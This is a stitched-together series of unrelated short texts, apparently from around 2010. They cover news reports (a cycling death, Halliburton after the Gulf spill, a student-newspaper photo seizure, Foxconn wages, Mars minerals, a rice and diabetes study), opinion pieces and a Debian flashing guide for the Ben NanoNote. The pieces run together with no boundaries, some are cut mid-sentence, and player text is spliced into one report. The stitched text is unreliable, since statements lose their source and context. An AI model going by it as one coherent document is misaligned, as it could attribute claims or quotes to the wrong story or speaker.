The 23 - year - old was given a two - year driving ban , a two - year community order and sentenced to 200 hours unpaid work .
The court was told that Mills was driving to work when the crash happened at Tedburn St Mary as a result of a spider dropping in front of her .
Concentration lapse
Prosecutor Richard Crabb said : " She grabbed it , opened the window and chucked it out of the car . "
Mr Crabb said Mills only realised she had struck the cyclist when she had looked back at the road .
He added : " It is estimated that she took her eyes off the road for two seconds . "
Mills , a civil engineer , told police at the scene that she was not a dangerous driver and said it had been a ' lapse of concentration ' .
The sentence passed can in no way repair the sense of loss that we feel and continue to feel each day Keith Richards , Victim 's brother - in- law
Simon Evans , an IT manager , was on the second day of a cycle ride from Land 's End to Derby when the crash happened .
The court was told he had been riding behind his brother - in - law , Keith Richards , and that he had been inside the rumble strip - not on the main road - when he was hit .
He was pronounced dead at hospital an hour later .
Mr Richards , 37 , from Reading , suffered leg injuries in the crash .
Defence barrister Rupert Taylor said that apart from the death and injury caused , there were no other aggravating features like speed , racing or drink .
He said that Mills was never going to drive again and described her as a " decent , productive , hard - working member of the community " .
The court was told that Mills had a clean driving record , no previous convictions and excellent prospects .
On sentencing her , Judge Graham Cottle said : " There is no basis for disbelieving your account that you took your eyes temporarily off the road to deal with a creature .
" You have never sought to blame any external factors in this case . "
Speaking after the sentence Keith Richards said : " The sentence passed can in no way repair the sense of loss that we feel and continue to feel each day . "
Article content
It ’s so passe to put your dogs in purses and buy them designer clothes these days .
In the newest pet fad , dog owners in China are dyeing their mutts to resemble pandas and tigers , the U.K. ’s Daily Telegraph
We apologize , but this video has failed to load .
tap here to see other videos from our team .
Try refreshing your browser , or Photos : Chinese paint their dogs to look like pandas , tigers in new fad Back to video
reports .
Chow Chow dogs that normally have golden fur are being dyed white and black to resemble fluffy pandas .
Golden Retrievers with light blonde hair are painted orange and given black stripes to look like tigers .
Oh , I love how China ’s burgeoning middle class spends its money on the bizarre .
More cute / ridiculous photos after the jump .
A Google search for “ dog dye
” frighteningly returns 2.7 million hits .
There are hundreds of websites that instruct pet owners how to dye their dogs ’ fur .
that spending in the U.K. on pets has increased by 500 % from 1999 to 2008 , at the expense of the animals ’ dignity , of course .
Check out this horrifying gallery
of pooches dyed in every colour the rainbow has to offer .
How to Get the Best Operating System for Mobile – Debian
Pyneo & Debian goes Nano - Note
Prepare Host System
You have to install the tool “ usbboot ” to flash the Nano - Note :
wget http://projects.qi-hardware.com/media/upload/xburst-tools/files/xburst-tools_0.0+201002-1_i386.deb dpkg -i xburst - tools_0.0+201002-1_i386.deb
Download what you need
You need an u-boot , kernel and rootfs .
Use my kernel because the openwrt kernel is missing some options ( inotify , fpu - emu , no splash , full size root partition ) .
Use the official u-boot for the Nano - Note Ben with lb60 - board , mine is made for the avt2 - board .
wget http://downloads.qi-hardware.com/software/images/Ben_NanoNote_2GB_NAND/latest/openwrt-xburst-u-boot.bin wget http://pyneo.org/downloads/nano/openwrt-xburst-qi_lb60-uImage.bin
# and one of wget http://pyneo.org/downloads/nano/debian-lenny-mini.ubi wget http://pyneo.org/downloads/nano/debian-lenny.ubi
There are some advantages in mine avt2 - u - boot ( kernel logging to tty1 , usb - ether - mac address constant ) , you can get it from :
wget http://pyneo.org/downloads/nano/openwrt-xburst-u-boot.bin
Prepare the Nano - Note
Put the Nano into usb - boot - mode ( see here for instructions how to do that ) .
I encoutered lots of problems with nand so I do a nand full erase before any operation :
usbboot -c " boot " sed - i 's / NAND_FORCEERASE = .*/ NAND_FORCEERASE = 1/' /etc/xburst-tools/usbboot.cfg usbboot -c " nerase 0 4096 0 0 "
Hints for flashing :
The nano is in usbboot mode if you see the folloing when issues on the host : # lsusb | grep 601a:4740 Bus 001 Device 038 : ID 601a:4740
When usbboot says : Device unboot !
Boot it first !
issue a `usbboot -c boot` .
Sometimes the software booted on the nano seems to crash .
You will see the following message in that case : Error - can't read bulk data from Ingenic device : ( or similar ) .
Just disconnect , wait a while ( about 30sec ) and reconnect the nano , reboot & try again .
When i did a full erase my nano was most often gone on the bus and the usbboot - program was unable to contact it afterwords ( see above ) .
i disconnected usb & battery and started all over .
If you do so leave the nano off for quite a while , just re-plugging immediatly did not work for me .
If you see any messages about bad blocks or messages from usbboot without a newline at the end that where hints that flashing did not take place correctly .
Start over with a full nand erase and reflash everything .
Skip a old bad block !
Flash with battery removed
If you use the avt2 - switch to toggle to usbboot mode redo the switching
If you encounter errors try another usb cable .
Use a direct usb connection , no hub inbetween .
I hope qi-hardware or sharism will come up with a solution of a more reliable flashing instead of this set of esoteric hints that changed the behaviour of usbboot for me .
Flash !
Flashing is straight forward :
usbboot -c " boot " usbboot -c " nprog 0 openwrt-xburst-u-boot.bin 0 0 - n " usbboot -c " nprog 1024 openwrt-xburst-qi_lb60-uImage.bin 0 0 - n " usbboot -c " nprog 2048 debian-lenny.ubi 0 0 - n "
You can also just flash the rootfs but i encountered another problem with the dedicated erase – sometimes it also trashed kernel and / or u-boot .
The commands would be
usbboot -c " boot " usbboot -c " nerase 16 4079 0 0 " usbboot -c " nprog 2048 debian-lenny.ubi 0 0 - n "
Again if you see strange messages do a full erase as described above .
Reboot .
10 sec later …
Using Debian on the Nano - Note
Console
You may use your Nano - Note via console & keyboard .
The keyboard is tiny but it has all keys that were needed to use a Unix - like system .
In the setup tty1 ( the active console after boot ) is dedicated to logging and does not show a login .
Activate the second console ( Alt - F2 or Alt - Right ) to get a login prompt .
The root - user has an empty password , a user named “ user ” is dedecated for running programs non-root .
If you are fed up with the keyboard you may step over to the next chapter .
Network
Your nano will get the ip 192.168.0.204 and expects your host to be a dns and gateway into the internet with ip 192.168.0.197
( See networked concept here ) .
ssh is listening and the root - pwd is empty .
It will start X via nodm under user “ user ” and a rxvt inside ( which does n’t help you much because the keymappings are missing ) .
Also pyneod and gsm-muxer are running already which could lead to memory problems on a lb60 - board .
The commands to setup the host network would be ( assuming networkinterface usb0 ) :
ifconfig usb0 192.168.0.197 up route add 192.168.0.204 usb0 echo 1 > / proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -j MASQUERADE
Building / Compiling
If you need a package that is not build for your platform you can now do :
apt - get install build - essential debhelper cdbs python - dev libgwenhy wfar47 - dev libaqbanking29 - dev dget -- build -u http://mister-muffin.de/pyneo/deb-sources/pyneo-pybankd_1.26-1.dsc dpkg -i pyneo-pybankd_1.26-1_mipsel.deb
If you ever do a `du` and a `df - sch /` and compare the numbers you will see a huge difference ( du is 50 % of df here ) .
Do n’t be scared , this is ubifs ’s on - the - fly compression feature .
Ending
Try to shutdown the Nano orderly always .
Ubifs has no fsck or the like to repair a corrupted filesystem .
So always issue an `halt` or `shutdown` when done .
HOUSTON / SAN FRANCISCO ( Reuters ) - Halliburton
Co , which did cementing work on the ruptured Gulf of Mexico well , said on Wednesday it expects to move people and equipment out of the region due to the U.S. government halt of deepwater drilling .
The company now has 2,200 of its 50,000 employees working in the region , accounting for 13 percent of its business in the first quarter , of which two - thirds was deepwater activities .
“ Halliburton is engaged in discussions with its customers and anticipates relocating equipment and personnel to other markets as appropriate , ” the company said in a filing with regulators .
Halliburton expects a Gulf of Mexico deepwater hiatus for at least six months , and possibly longer .
But executive Tim Probert noted on a conference call that the U.S. moratorium did allow for well completions and maintenance , so activity would not completely stop .
Probert , the president of global business lines who was recently also named chief health , safety and environment officer , said the industry had plenty of work to do in the down time to prepare for a new regulatory regime .
“ We should n’t consider the next six months to be a completely dead period , ” he said .
“ Clearly , it ’s in the interest of the nation to ensure we have the ability to continue to produce hydrocarbons safely in offshore waters , and I think everybody ’s going to work diligently toward that . ”
BP Plc was the operator on the well which ruptured on April 20 , killing 11 workers and sinking a Transocean Ltd drilling rig .
The well has since spewed as much as 19,000 barrels of oil a day into the Gulf of Mexico .
Investors are increasingly worried about Halliburton ’s financial exposure to the spill .
The company ’s credit default swaps , protecting its debt , rose 35 basis points to 157 basis points on Wednesday , more than double their level a few days before , according to Markit Intraday data .
Executives repeated on the call that the company was indemnified under its contract with BP , but Halliburton has $ 600 million of general liability insurance , and $ 3.2 billion of cash and $ 1.2 billion in revolving credit to cope with any uncertainties .
Asked about the potential liability for gross negligence , Chief Financial Officer Mark McCollum said while this was theoretically possible , it would not apply in this case .
“ I ’m not a lawyer , but the general standard for gross negligence is a willful disregard for life and property , ” he said .
“ When we make the statement that we believe we followed BP ’s instructions , you ca n’t develop a legal argument around gross negligence if you follow their instructions . ”
Shares of Halliburton , with headquarters in Houston and Dubai , rose 11 percent to $ 23.49 in midday trading , reversing the losses of the previous day amid a sector - wide sell - off .
Probert said Gulf of Mexico shallow - water activity would start picking up within weeks , but anticipated pricing pressure on services during the moratorium due to excess capacity .
As for the rest of its business , McCollum said U.S. on - shore activity was growing stronger in the second quarter and international activity , of which about half is offshore , would continue recovering through this year .
Vending machines in neon - splashed Tokyo have electronic eyes that evaluate customers ’ skin and wrinkles to determine whether they are old enough to buy tobacco .
In bathrooms at upscale Canadian bars , vending machines with flat irons enable women to defrizz their locks .
In Abu Dhabi , the lobby of a luxury hotel has a vending machine that dispenses gold bars and coins at more than $ 1,000 an ounce .
A new breed of vending machine is proliferating around the world — and while the United States is coming late to the party , Dr Pepper and Baby Ruth are already feeling sidelined .
Flashy and futuristic , souped - up machines are popping up everywhere , be it the Mondrian hotel in Miami or at Macy ’s in Minneapolis .
They have touch screens instead of buttons , facades that glow and pulse , and technology intended to blunt vending machine rage — sensors that ensure that a customer ’s credit card is not charged unless the chosen item has dropped .
These machines are not for quarters : purchases are measured in dollar amounts that typically start at two figures and go up .
Changing consumer preferences about shopping and the high cost of operating brick - and - mortar stores are inspiring premium brands to rethink how they sell their wares .
As Gower Smith , whose company , ZoomSystems , has created about 1,000 automated kiosks called ZoomShops , put it , “ A ZoomShop costs less than an employee . ”
This weekend , 2012 Presidential candidate Sarah Palin delivered a keynote address at the 2010 ICSC RECon conference , a retail real estate conference in Las Vegas .
Of course , whenever a conference has a speaker like this , the draw is the speaker 's celebrity power , not their glints of insight about the actual topic at hand .
Still , you kind of expect the speaker to tailor their speech a little bit to the crowd .
Apparently in this case that did n't happen .
Mainly she just delivered a stump speech .
According to Ian Ritter , she slammed Obama as an addict of other people 's money -- OPM , which she pronounced " opium . "
According to the Dirt Lawyer 's Blog , her speech went over like a ton of bricks , owing to the fact that she did n't touch on real estate
Speaking of disappointment , let 's talk about the keynote address from Sarah Palin .
In short , it was a standard stump speech with a few superficial comments about shopping centers and retail real estate .
It was awful and a borderline train wreck in my opinion .
All Palin had to do was add in a paragraph about the pending disaster of carried interest and she would have not only won over the crowd but gotten significant fundraiser cash from the industry if she runs in 2012 .
As it stands , I do not know if she knows what carried interest is .
David Bodamer at TrafficCourt had basically the same reaction , expressing surprise at the lack of taxation talk .
There 's no sign her star power is diminishing just yet , but if she wants to get serious about the business of raising money from industry groups , it sounds like she 'll need to hone her message a little bit .
Va. prosecutor apologizes for seizing photos from JMU newspaper
A Virginia prosecutor has apologized for obtaining a search warrant and seizing 962 unpublished digital photos from The Breeze , the student newspaper at James Madison University , in April , according to documents released by both sides Tuesday .
Most of the photos were from Springfest , an April 10 block party near campus that attracted thousands of people and erupted into violence .
Harrisonburg Commonwealth's Attorney Marsha L. Garst said in a statement that her office and police officers wanted to review the photos to identify more individuals who " were involved in extremely violent attacks on various individuals . "
Within hours of the raid , open records advocates and journalism organizations admonished Garst for using a search warrant to obtain the photos from the student paper , instead of following the traditional practice of subpoenaing the photos .
The two disks containing the digital photos have been returned to The Breeze , and the involved law enforcement parties have agreed to reimburse the newspaper $ 10,000 for legal expenses , according to the settlement agreement .
In exchange , The Breeze agreed to post 20 photos on its Web site from eight specific events being investigated by the police and prosecutors .
In a statement Garst apologized " for the fear and concern that I caused the Breeze and its staff .
The discussions that have occurred have enhanced my understanding and re-enforced the role of a free press in our democracy . "
Garst said that in the future , when seeking information and documents from news organizations , including student media , she will do so through the subpoena process .
Breeze Editor - in - Chief Katie Thisdell said in a statement that while the newspaper could sue various officials who were involved , " we have strongly preferred to resolve this matter informally through discussions with the Commonwealth 's Attorney . "
The settlement ends a month - and - a - half long debate over the photos , which began when someone from the prosecutor 's office called the student newspaper a few days after the riot and asked for copies of unpublished photos .
The Breeze staff declined to do so , citing the journalist 's privilege under the First Amendment , the Virginia Constitution and common law , according to the settlement .
The prosecutor 's office also contacted the university 's director of judicial affairs and general counsel , who declined to intervene , according to Garst 's statement .
The next day , Garst received a search warrant for " all electronic devices " that are " on the premises or possessed or owned or leased or used by ' The Breeze ' or by any of its employees , agents or members , " so they could obtain photos , videos or other images recorded that weekend , according to a copy of the warrant .
Garst and a number of plainclothes officers then executed the warrant .
Again , Thisdell and other newspaper officials stated that the seizure violated laws protecting journalists and their unpublished work .
When Garst threatened to take all of the newspaper 's equipment , which would prevent them from publishing , Thisdell agreed to help the officers copy 962 images onto two disks .
When controversy broke out over the seizure , Garst agreed to let a third - party hold onto the disks until the matter could be resolved .
At that point , law enforcement officials had not reviewed or copied the " sealed disks , " according to the settlement .
The newspaper 's adviser , Professor Roger Soenksen , then took custody of the disks .
On May 3 , Garst narrowed her request for images to just eight specific events during Springfest , and notified the newspaper that she would ask for those images through a subpoena .
The newspaper staff consulted their attorney and decided to release 20 photos that a judge might later require them to release .
The Breeze agreed to post these photos on their website , where they will be available for all to view .
Follow Campus Overload all day , every day at http://washingtonpost.com/campus-overload.
Check out our new Higher Education page , follow me on Twitter and fan Campus Overload on Facebook .
There will be a ban on the product placement of tobacco , alcohol , gambling , foods or drinks that are high in fat , salt or sugar , medicines and baby milk .
Ofcom is also proposing to ban the placement of products and services that cannot be advertised on television , including weapons .
The ThreatFactor NSIA is a website scanner that monitors websites in realtime in order to detect defacements , compliance violations , exploits , sensitive information disclosure and other issues .
Threat Factor detects issues remotely and therefore requires no software to install , does not introduce any latency and will not interrupt business operations .
At it ’s core , Threat Factor uses an advanced analysis engine that is capable of detecting a wide variety of issues and can be modified with custom signatures .
NSIA can be configured perform almost any action once an issue is identified , such as sending a text message ( IM , email , SMS ) or executing a script .
Type of Issues Detected
The ThreatFactor solution was designed specifically to help organizations quickly identify issues on your websites that may tarnish your organization ’s image or adversely affect your customers , partners and employees such as :
Website Defacements : Malicious users are trolling the Internet specifically for websites to deface .
Oftentimes , these websites contain offensive language or images and likely result in tarnished image .
Compliance and Privacy Issues : ThreatFactor can detect issues that may adversely affect compliance or user privacy such as : forms that submit passwords unencrypted , pages that accept user information but do n’t include a privacy policy , etc .
Web Exploits : Oftentimes , attackers compromise a website and install exploits to attack the website visitors .
These are often classified as silent defacements since the site does not look like it was visually changed .
Sophos noted that the vast majority of websites hosting malware ( around 80 % ) are legitimate sites that have been compromised .
Furthermore , ThreatFactor can detect websites that have been modified in such a way to send private customer information ( such as login information ) to a third party .
Sensitive Information Leaks : Websites can leak sensitive information through detailed error messages , files that were not intended to served to the public and misinformed blogger employees .
System Failures : ThreatFactor can detect many types of website system problems such as :
Broken Links
Error and warning messages
Poorly configured servers or servers with default configuration
Expired SSL certificates
Server errors
Key Features
Below is an infographic about the very foundation of the internet .
Porn .
Porn , is what the internet was made for .
But did you know how much money is rakes in or what keywords are most used when searching for fapping material ?
Some of the stats below are quite interesting .
[ youtube ]
http://www.youtube.com/watch?v=T-TA57L0kuc[/youtube]
[ CuriousRead ]
→ Washington ’s Blog
The government spent $ 175 million investigating the Challenger space shuttle disaster .
It spent $ 152 million on the the Columbia disaster investigation .
It spent $ 30 million investigating the Monica Lewinsky scandal .
The government only authorized $ 15 million for the 9/11 Commission .
And how much has the government authorized for the Financial Crisis Inquiry Commission ?
You know , the commission charged with getting to the bottom of what caused the financial crisis ?
Just $ 8 million .
The Sun has come in for criticism after deciding to publish a poll in the wake of David Laws 's resignation asking if gay people should be allowed to be cabinet ministers .
Today 's Sun poll , which was conducted by research firm YouGov , asked three questions relating to the resignation of treasury chief secretary Laws after he admitted paying rent to his partner , James Lundie .
The third question , " Should gay people be cabinet ministers ? " , has caused a social media backlash on Twitter criticising the Sun 's decision to ask such a question .
A total of 89 % of the 958 people polled by YouGov either actively supported or were accepting of gay cabinet ministers , with 13 % saying it is " a good thing " while 76 % did not mind .
Of the rest , 5 % did not have a view and a further 5 % said that gay cabinet ministers were " a bad thing " .
The Sun poll also found that only 7 % of people thought Laws 's resignation would permanently harm the coalition government , while 72 % believed that he was right to stand down for breaking MPs ' expenses rules .
However , 17 % said that he should stay as he is " basically honest and we need his talent " .
The Daily Mail 's Richard Littlejohn has also added fuel to the fire , opening his column with the line , " To be honest , I 've always considered all Liberal MPs to be homosexuals unless furnished with concrete proof to the contrary " , as an eye - grabbing way to push his argument that the Laws resignation is about stealing .
In 1998 the Sun infamously questioned whether Britain was being run by a " gay mafia " in a front page splash after political columnist Matthew Parris said in a television interview that Peter Mandelson was " certainly gay " .
The then - editor David Yelland made a statement a week later that the Sun was to change its approach to homosexuals in public life .
" The Sun is no longer in the business of destroying closet gays ' lives by ' exposing ' them as homosexuals , " he said at the time .
• To contact the MediaGuardian news desk email editor@mediatheguardian.com or phone 020 3353 3857 .
For all other inquiries please call the main Guardian switchboard on 020 3353 2000 .
• If you are writing a comment for publication , please mark clearly " for publication " .
Obama has said he would have fired Tony Hayward , BP ’s chief executive , but his own managers have not been held so accountable .
The new director of M.M.S. installed by Salazar 10 months ago has now walked the plank , but she does n’t appear to have been a major player in lapses that were all but ordained by policy imperatives from above .
The president has still neither explained nor apologized for his own assertion in early April that “ oil rigs today generally do n’t cause spills ” — a statement that is simply impossible to square with Salazar ’s claim that the administration ’s new offshore drilling policy , supposedly the product of a year ’s study , was “ based on sound information and sound science . ”
The president must come clean and clean house not just because it ’s right .
He must rebuild confidence in his government for that inevitable day when the next crisis hits the fan .
That would be Afghanistan , and the day is rapidly arriving .
Already Obama ’s chosen executive there , Gen. Stanley McChrystal , is calling the much - heralded test case for administration counterinsurgency policy — the de-Talibanization and stabilization of the Marja district — “ a bleeding ulcer . ”
And that , relatively speaking , is the good news from this war .
Image Credit ...
Barry Blitt
The president ’s shake - up of his own governance can’t wait , as tradition often has it , until after the next election .
The Tea Party is at the barricades .
When Obama said yet again on Tuesday that he would be “ happy to look at other ideas and approaches from either party , ” you wanted to shout back , Enough already !
His energy would be far better spent calling out in no uncertain terms what the other party ’s “ ideas and approaches ” are .
The more the Fox - Palin right has strengthened its hold on the G.O.P. during primary season , the sharper and more risky its ideology has become .
When Rand Paul defended BP against Salazar ’s ( empty ) threat to keep a boot on the company ’s neck , he was not speaking as some oddball libertarian outlier .
His views are mainstream in his conservative cohort .
Traditional Republican calls for limited government have given way to radical cries for abolishing many of modern government ’s essential tasks .
Paul has called for the elimination of the Department of Education , the Federal Reserve and the Americans with Disabilities Act .
The newest G.O.P. star —
Sharron Angle , the victor in this month ’s Republican senatorial primary in Nevada — has also marked the Energy Department , the Environmental Protection Agency , the Department of Veterans Affairs , Social Security and Medicare for either demolition or privatization .
Pertinently enough , Angle has also called for processing highly radioactive nuclear waste at Nevada ’s Yucca Mountain .
If Americans abhor poorly regulated deepwater oil drilling , wait until they get a load of nuclear waste on land with no regulatory agency in charge at all .
The choice between inept government and no government is no choice at all , of course .
But there would be a clear alternative if the president could persuade the country that Washington , or at least its executive branch , can be reformed — a process that demands him to own up fully to his own mistakes and decisively correct them .
While the greatest environmental disaster in our history is a trying juncture for Obama , it also provides him with a nearly unparalleled opening to make his and government ’s case .
The spill ’s sole positive benefit has been to unambiguously expose the hard right , for all its populist pandering to the Tea Partiers , as a stalking horse for its most rapacious corporate patrons .
If this president can speak lucidly of race to America , he can certainly explain how the antigovernment crusaders are often the paid toadies of bad actors like BP .
Such big corporations are only too glad to replace big government with governance of their own , by their own , and for their own profit — while the “ small people ” are left to eat cake at their tea parties .
Science & Exploration
Wet era on early Mars was global 25/06/2010 2185 views 3 likes
Conditions favourable to life may once have existed all over Mars .
Detailed studies of minerals found inside craters show that liquid water was widespread , not only in the southern highlands , but also beneath the northern plains .
ESA ’s Mars Express and NASA ’s Mars Reconnaissance Orbiter have discovered hydrated silicate minerals in the northern lowlands of Mars , a clear indication that water once flowed there .
Lyot crater and the locations of the hydrated minerals
The spacecraft have previously discovered thousands of small outcrops in the southern hemisphere where rock minerals have been altered by water .
Many of these exist in the form of hydrated clay minerals known as phyllosilicates , and indicate that the planet ’s southern hemisphere was once much warmer and wetter than it is today .
However , until this week , no sites with hydrated silicate minerals had been found in the northern lowlands , where thick blankets of lava and sediments up to several kilometres thick hamper efforts to probe the underlying bedrock .
The first hints that there may be hydrated silicates beneath the northern plains were provided by Mars Express ’ OMEGA sensor .
However , the outcrops were small and more detailed observations were required to confirm their presence .
The OMEGA team sifted higher resolution data from a sensor on NASA ’s orbiter .
Colour coded Mars showing Lyot Crater
Their search concentrated on 91 sizeable impact craters where incoming asteroids had punched down several kilometres , exposing ancient crustal material .
As reported this week in the journal Science , at least nine craters were found to contain phyllosilicates or other hydrated silicates .
These minerals , which formed in wet environments on the surface or underground , were identical to those found in the southern hemisphere .
“ We can now say that the planet was altered on a global scale by liquid water more than 4 billion years ago , ” says John Carter , University of Paris , the report ’s lead author .
With the small sample of widely scattered sites , it is difficult to draw conclusions about the type of environment all that time ago .
However , the nature and locations of the minerals provide some clues .
“ They are rich in iron and magnesium , but less in aluminium .
Together with the close proximity of olivine , which is easily modified by water , this indicates that the exposure to water lasted only tens to hundreds of millions of years , ” says Jean - Pierre Bibring , the OMEGA Principal Investigator from the University of Paris .
Although Mars ’ potential habitability did not last long , remarkably its record is still preserved in phyllosilicate - rich spots .
A number of scientists have suggested that a shallow ocean subsequently covered the lava - coated northern plains .
However , no evidence in support of this is provided by the new results .
“ Our studies do not find any signs of the lava plains in the north being altered by water , ” says Dr Bibring .
On a positive note , the new results may suggest sites for future landers because evidence for water during the early history of Mars suggests that conditions may have been favourable for the evolution of primitive life .
“ These results reveal the history of Mars derived from the planet ’s mineralogy , ” says Olivier Witasse , ESA Project Scientist for Mars Express .
“ It is another example of the fruitful cooperation between European and American scientists . ”
Ready the hype engines .
Set your expectations to their loftiest , for Nintendo Power is tormenting early subscribers of the mag with a forthcoming reveal of a " huge new title " to debut right around E3 2010 .
Advertisement
" Next issue 's going to be a big one , " teases the Nintendo focused mag .
" In addition to an exclusive cover story on a huge new title , we 'll bring you first looks of half a dozen incredible games , including de Blob 2 and an astonishing title that stars one of gaming 's most recognizable heroes . "
Sure , we know that THQ is keen to squeeze more success out of de Blob , so a sequel does n't surprise us .
But what would Nintendo Power have on its hands ?
And who would you consider " one of gaming 's most recognizable heroes " ?
Advertisement
For the game , gotta be Clu Clu Land Wii .
I 'm calling it now .
Nintendo Power Hypes Another " Huge New Title " [ GoNintendo ]
In its long - lasting battle against YouTube , Turkey officials banned a new set of Google - owned IPs in an attempt to stop Turkish Internet users from accessing the dreaded video platform .
According to the online edition of the Turkish newspaper Hürriyet , Turkey ’s Telecommunications Communication Presidency ( TIB ) came out Friday June 4th and announced that it blocked access to some Google IP addresses due to legal reasons .
The news came after users started experiencing problems since the middle of the week with services like Google Translate , Google Analytics , Google Docs , Google Tools and Google Books .
To set things straight , nothing new happened between Google and Turkey to trigger such a harsh reaction from Ankara government .
The situation between the Turkish officials and Mountain - View management has n't changed since March 2007 , when because of a defamatory YouTube video against the country 's founding father , Mustafa Kemal Atatürk , the presidency decided through a court order to ban access to YouTube in their country .
As Hürriyet shows , aided by Turkish lawyer Mehmet Ali Köksal , the court order and the government 's recent actions do n't show an escalation or a conflictual position against Google , but more a technical mishap from the Ankara officials .
Due to the fact that Google owns its personal DNS from which it can change the IPs of its own services according to their own needs and various technical reasons , it 's serving Google Search , YouTube , and its huge portfolio of services practically from a fixed range of Internet addresses .
When Turkey technicians tried to ban a new set of YouTube IPs , they again narrowed down the small area of Google IPs .
But this time around , they managed to restrict access of other Google services which now may use former YouTube IPs , already banned across Turkey in the last two years .
So what did we learn from this ?
If you live in country A and hate country B , and would want to see citizens of country B have a miserable life , just shoot a video in which you are making fun of country B's government / history , put it on YouTube and voila .
Country B's government will just go crazy and ban the entire Google network ( or Facebook , or Wikipedia , or Flickr , or Twitter , etc , see example 1 or example 2 ) .
SAN FRANCISCO — Google plans to stop automatically sending users in mainland China to its uncensored Hong Kong site , in an effort to appease Beijing as it seeks to renew its license to operate in China .
The action , experts on China say , amounts to a symbolic gesture that Google hopes will placate the Chinese government , which may be feeling pressure from citizens who are demanding continued access to Google ’s search engine .
Google may also be hoping the Chinese government wants to avoid another showdown over Web censorship on the eve of a coming visit to the United States by President Hu Jintao .
Since it said earlier this year that it could no longer justify filtering its search results in China to meet government requirements , Google has found a clever way to continue to operate in the country .
Image caption
White rice has a higher glycaemic index than brown rice
Replacing white rice with brown rice and wholemeal bread could cut the risk of diabetes by a third , US experts say .
White rice poses a diabetes threat because it causes steep rises in blood sugar , say Harvard researchers in Archives of Internal Medicine .
Brown rice and other wholegrain foods are a healthier option as they release glucose more gradually , they say .
The study is based on questionnaires ; some say the data is not robust enough to base firm conclusions on .
It may be that people who eat less white rice tend to live healthier lifestyles , for example .
' Brown is better '
In the study of nearly 200,000 US people , white rice consumption was linked to type 2 diabetes .
After adjusting for age and other diabetes risk factors , those who ate five or more 150g servings of white rice per week had a 17 % increased risk of diabetes compared with people who consumed less than one serving - about a cup of rice - per month .
Although few people - only 2 % - in the study ate this much white rice , the finding was significant .
The best way to prevent type 2 diabetes is by keeping active and eating a healthy balanced diet that is low in fat , salt and sugar with plenty of fruit and vegetables Dr Victoria King , Diabetes UK
Yet eating brown rice appeared to have the opposite effect , cutting the risk of type 2 diabetes .
People who ate two or more servings of brown rice per week had an 11 % reduced risk of developing the condition compared with those who ate less than one serving a month .
Based on the results , the researchers estimate that replacing 50g or one - third of a typical serving of white rice with the same amount of brown rice would lead to a 16 % lower risk of type 2 diabetes .
And replacing the white rice with wholegrains , including brown rice and pasta , wholemeal bread and rolled oats , could cut the risk by more than a third .
Food composition
Dr Qi Sun and other researchers say the explanation lies in the composition of the food .
Like other wholegrain foods , brown rice is high in fibre and releases its energy slowly .
In contrast , white rice has had all the bran and some of the germ removed during milling .
This gives white rice a higher glycaemic index ( GI ) - a measure of how much a food raises blood sugar levels compared with the same amount of glucose or white bread .
" From a public health point of view , replacing refined grains such as white rice by whole grains , including brown rice , should be recommended to facilitate the prevention of type 2 diabetes , " according to the researchers .
Experts generally recommend that at least half of carbohydrate intake should come from whole grains like brown rice .
More than 70 % of the rice consumed in developed countries such as the US and UK is white .
Dr Victoria King of Diabetes UK said that , since the results were from self - reported food diaries and questionnaires , it was not possible to make conclusive recommendations on how much of certain foods , such as brown rice , might protect against type 2 diabetes at this stage .
" The best way to prevent type 2 diabetes is by keeping active and eating a healthy balanced diet that is low in fat , salt and sugar with plenty of fruit and vegetables , " she said .
American Special Operations forces have been running a secret prison in Afghanistan , according to information gathered by the Red Cross .
Known as the “ Tor ” or Black Jail by detainees , the facility is reportedly part of the U.S. military ’s larger prison at Bagram Air Base .
American commanders have denied the existence of the black jail .
However , both the BBC and The New York Times have interviewed f ormer detainees held at the secret facility , where they claimed they were abused , and now the Red Cross has confirmed that , since August 2009 , U.S. officials have been informing them of the names of the prisoners kept in the separate detention center .
“ The black jail was the most dangerous and fearful place , ” Hamidullah , an Afghan held at the prison , told The New York Times .
“ They do n’t let the [ International Red Cross ] officials or any other civilians see or communicate with the people they keep there .
Because I did not know what time it was , I did not know when to pray . ”
President Barack Obama ordered the CIA in January 2009 to close down all of its secret or black site prisons where suspected terrorists were held .
But that order applied only to the intelligence agency , not the military .
- Noel Brinkerhoff
Image caption Foxconn workers will receive the pay hike after three months ' probation
An electronics company hit by a string of suicides has raised wages in China - for the second time in less than a week .
Foxconn will increase salaries at its Shenzhen plant by nearly 70 % from as early as 1 October , if workers meet certain conditions .
This is in addition to last week 's announcement that wages would go up by 30 % .
There have been 10 suicides at the Taiwan firm 's Shenzhen factory in 2010 .
Shares down
A statement from Foxconn , which makes Apple 's iPad and iPhone , as well as other top brands , said the second pay rise would lessen the pressure on workers to do overtime .
" While overtime work was always voluntary , this wage increase will reduce overtime work as a personal necessity , " the statement said .
It said wages for production line employees at the firm 's Shenzhen plant would rise from 1,200 yuan ( $ 176 , £ 122 ) to 2,000 yuan .
Image caption
The firm makes products for Apple and other technology brands
To get that pay rise , workers first have to pass a performance test lasting three months .
New employees will be put on probation for the same amount of time before getting the increase .
Pay increases for workers at Foxconn 's other Chinese plants - it employs more than 800,000 people in China - will be announced from July 1 .
" This wage increase has been instituted to safeguard the dignity of workers , " said Foxconn 's founder and chairman , Terry Gou .
This latest announcement is in addition to last Wednesday 's pay rise of 30 % at all its factories in China .
Foxconn , the trading name for Hon Hai Precision Industry Company , declined to say why there have been two large wage increases in less than a week .
" I can't comment on that , " said a company spokeswoman .
The firm has been hit by a series of suicides this year .
Ten people have killed themselves at its plant in Shenzhen , in southern China , which employs about 400,000 people .
Three more apparently tried to take their own lives .
Mr Gou said he was having trouble sleeping at night - and dreads an after - hours phone call , fearing it will be another suicide .
Increasing pay is just one method to make sure workers are more " stable and comfortable " .
Foxconn has also employed psychiatrists and installed safety nets on buildings .
While the pay rise is good for workers , investors took a different view .
The company 's shares fell sharply on the Taiwan stock market following the announcement of the second pay rise .
Trading in the company 's shares on the Hong Kong Exchange was suspended on Monday .
Disclosure : I 'm also doing paid work as a Fellow for ProgressiveCongress.org in addressing the necessity of filibuster reform in the Senate .
The Fellowship is being supported in part by CREDO Action and Blue America .
You can help support this work by signing CREDO Action 's petition and / or donating at Blue America 's ActBlue page .
I sure have to make a lot of disclosures these days .
Well , I do make a lot of disclosures .
Or repeat them , anyway .
I guess I do n't have to .
But I do .
This time , it 's filibuster reform .
